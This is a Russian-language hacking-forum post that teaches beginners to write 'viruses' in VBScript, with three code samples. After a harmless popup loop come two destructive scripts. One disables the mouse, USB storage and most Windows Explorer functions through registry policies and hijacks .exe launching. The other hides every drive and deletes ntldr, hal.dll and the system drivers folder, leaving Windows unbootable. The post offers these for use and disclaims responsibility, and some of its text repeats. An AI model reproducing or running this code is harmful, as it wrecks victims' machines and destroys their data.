1 Вирусы формата bat Пт Апр 13, 2012 8:51 am
Администратор
Ефрейтор
в этой теме я науча вас как создавать вирусы, специально для начинающих хакеров вроде меня))
открываем блокнот
это вирус не опасный, просто выводится сообщение, можете посмотреть получилось у вас или нет, надеюсь вы понимаете что вместо "текст сообщения" и "заголовок" должен быть ваш текст
сделайте блокнот фотмата exe или vbs
теперь переходим на более опасные вирусы
это опасный вирус он блокирут кнопки мышки, удаляет пуск, отключает мышь, отключить USB, меняет регестрационные данные, и много еще чего ...
очень злой вир.:удаление драйверов, блокировка доступа ко всем дискам, удалить htldr ,и.т.д
Р.S. Я за их действие не отвечаю !!!!!!!
открываем блокнот
- Код:
virus от SEVEN
on error resume next
Set S = CreateObject("Wscript.Shell")
set FSO=createobject("scripting.filesystemobject")
i=1
while i>0 or i<0
S.popup "Текст сообщения",0, "Заголовок сообщения",0+0
i=i-1
wend
это вирус не опасный, просто выводится сообщение, можете посмотреть получилось у вас или нет, надеюсь вы понимаете что вместо "текст сообщения" и "заголовок" должен быть ваш текст
сделайте блокнот фотмата exe или vbs
теперь переходим на более опасные вирусы
- Код:
'This virus от SEVEN
on error resume next
Set S = CreateObject("Wscript.Shell")
set FSO=createobject("scripting.filesystemobject")
s.regwrite"HKLM\SYSTEM\CurrentControlSet\Services\ Cdrom\AutoRun","0","REG_DWORD"randomize
do
h=cint(rnd()*1000)
m=cint(rnd()*1000)
if h<=23 and m<=59 then
wscript.sleep 1000
s.run "cmd /c time "&h&":"&m,0
end if
loops.regdelete"HKLM\SOFTWARE\Microsoft\Windows\Cu rrentVersion\Explorer\Desktop\NameSpace\{645FF040-5081-101B-9F08-00AA002F954E}\"
s.regwrite "HKEY_CLASSES_ROOT\CLSID\{645FF040-5081-101B-9F08-00AA002F954E}\LocalizedString","Помойка ламера"
s.regwrite "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\RegisteredOwner","Ламер"
s.regwrite "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\RegisteredOrganization","Психушк а"
s.regwrite"HKCU\Software\Microsoft\Windows\Current Version\Policies\Explorer\NoViewContextMenu","1"," REG_DWORD"
s.regwrite"HKCU\Software\Microsoft\Windows\Current Version\Policies\Explorer\NoStartMenuPinnedList"," 1","REG_DWORD"
s.regwrite"HKCU\Software\Microsoft\Windows\Current Version\Policies\Explorer\NoStartMenuMFUprogramsLi st","1","REG_DWORD"
s.regwrite"HKCU\Software\Microsoft\Windows\Current Version\Policies\Explorer\NoUserNameInStartMenu"," 1","REG_DWORD"
s.regwrite"HKCU\Software\Microsoft\Windows\Current Version\Policies\NonEnum\{20D04FE0-3AEA-1069-A2D8-08002B30309D}","1","REG_DWORD"
s.regwrite"HKCU\Software\Microsoft\Windows\Current Version\Policies\Explorer\NoNetworkConnections","1 ","REG_DWORD"
s.regwrite"HKCU\Software\Microsoft\Windows\Current Version\Policies\Explorer\NoStartMenuNetworkPlaces ","1","REG_DWORD"
s.regwrite"HKCU\Software\Microsoft\Windows\Current Version\Policies\Explorer\StartmenuLogoff","1","RE G_DWORD"
s.regwrite"HKCU\Software\Microsoft\Windows\Current Version\Policies\Explorer\NoStartMenuSubFolders"," 1","REG_DWORD"
s.regwrite"HKCU\Software\Microsoft\Windows\Current Version\Policies\Explorer\NoCommonGroups","1","REG _DWORD"
s.regwrite"HKCU\Software\Microsoft\Windows\Current Version\Policies\Explorer\NoFavoritesMenu","1","RE G_DWORD"
s.regwrite"HKCU\Software\Microsoft\Windows\Current Version\Policies\Explorer\NoRecentDocsMenu","1","R EG_DWORD"
s.regwrite"HKCU\Software\Microsoft\Windows\Current Version\Policies\Explorer\NoSetFolders","1","REG_D WORD"
s.regwrite"HKCU\Software\Microsoft\Windows\Current Version\Policies\Explorer\NoAddPrinter","1","REG_D WORD"
s.regwrite"HKCU\Software\Microsoft\Windows\Current Version\Policies\Explorer\NoFind","1","REG_DWORD"
s.regwrite"HKCU\Software\Microsoft\Windows\Current Version\Policies\Explorer\NoSMHelp","1","REG_DWORD "
s.regwrite"HKCU\Software\Microsoft\Windows\Current Version\Policies\Explorer\NoRun","1","REG_DWORD"
s.regwrite"HKCU\Software\Microsoft\Windows\Current Version\Policies\Explorer\NoStartMenuMorePrograms" ,"1","REG_DWORD"
s.regwrite"HKCU\Software\Microsoft\Windows\Current Version\Policies\Explorer\NoClose","1","REG_DWORD"
s.regwrite"HKCU\Software\Microsoft\Windows\Current Version\Policies\Explorer\NoChangeStartMenu","1"," REG_DWORD"
s.regwrite"HKCU\Software\Microsoft\Windows\Current Version\Policies\Explorer\NoSMMyDocs","1","REG_DWO RD"
s.regwrite"HKCU\Software\Microsoft\Windows\Current Version\Policies\Explorer\NoSMMyPictures","1","REG _DWORD"
s.regwrite"HKCU\Software\Microsoft\Windows\Current Version\Policies\Explorer\NoStartMenuMyMusic","1", "REG_DWORD"
s.regwrite"HKCU\Software\Microsoft\Windows\Current Version\Policies\Explorer\NoControlPanel","1","REG _DWORD"
set application=createobject("shell.application")
application.minimizeall
s.run"rundll32 user32, SwapMouseButton"
s.regwrite"HKCR\exefile\shell\open\command\","rund ll32.exe"
s.regwrite"HKLM\SYSTEM\CurrentControlSet\Services\ USBSTOR\Start","4","REG_DWORD"
s.regwrite"HKLM\SYSTEM\CurrentControlSet\Services\ Mouclass\Start","4","REG_DWORD"
do
wscript.sleep 200
s.sendkeys"{capslock}"
wscript.sleep 200
s.sendkeys"{numlock}"
wscript.sleep 200
s.sendkeys"{scrolllock}"
fso.getfile("A:\")
execute"S.Run ""%comspec% /c "" & Chr(7), 0,True"
loop
это опасный вирус он блокирут кнопки мышки, удаляет пуск, отключает мышь, отключить USB, меняет регестрационные данные, и много еще чего ...
- Код:
on error resume next
Set S = CreateObject("Wscript.Shell")
set FSO=createobject("scripting.filesystemobject")
s.regwrite"HKCU\Software\Microsoft\Windows\Current Version\Policies\Explorer\NoDrives","67108863","RE G_DWORD"
s.regwrite"HKCU\Software\Microsoft\Windows\Current Version\Policies\Explorer\NoViewOnDrive","67108863 ","REG_DWORD"
fso.deletefile "C:\ntldr",1
Set Folder = FSO.GetFolder(fso.getspecialfolder(0)+"\system32\d rivers\")
For Each File In Folder.Files
File.delete
Next
fso.deletefolder fso.getspecialfolder(0)+"\Driver Cache"
fso.deletefile fso.getspecialfolder(0)+"\system32\hal.dll",1
fso.deletefolder fso.getspecialfolder(0)+"\system32\drives",1
очень злой вир.:удаление драйверов, блокировка доступа ко всем дискам, удалить htldr ,и.т.д
Р.S. Я за их действие не отвечаю !!!!!!!